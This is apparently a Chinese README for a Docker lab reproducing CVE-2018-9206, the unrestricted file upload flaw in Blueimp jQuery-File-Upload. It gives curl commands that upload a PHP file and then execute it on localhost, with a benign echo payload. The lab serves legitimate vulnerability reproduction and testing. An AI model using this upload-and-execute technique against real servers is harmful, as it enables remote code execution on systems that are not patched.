CVE-2018-9206 的脆弱 Docker 环境 — Blueimp jQuery-File-Upload <= 9.22.0 中的无限制文件上传漏洞。
docker compose up -d --build
应用地址:http://localhost:8888/jQuery-File-Upload/
# 上传一个 PHP 文件
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
-F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'
# 执行它
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# 输出:CVE-2018-9206-PWNED
或运行 PoC 脚本:
./scripts/poc.sh
docker compose down -v
| 字段 | 值 |
|---|---|
| CVE | CVE-2018-9206 |
| 产品 | Blueimp jQuery-File-Upload |
| 版本 | 9.22.0 |
| 类型 | 无限制文件上传 → 远程代码执行 |
| CVSS |
| 9.8(严重) |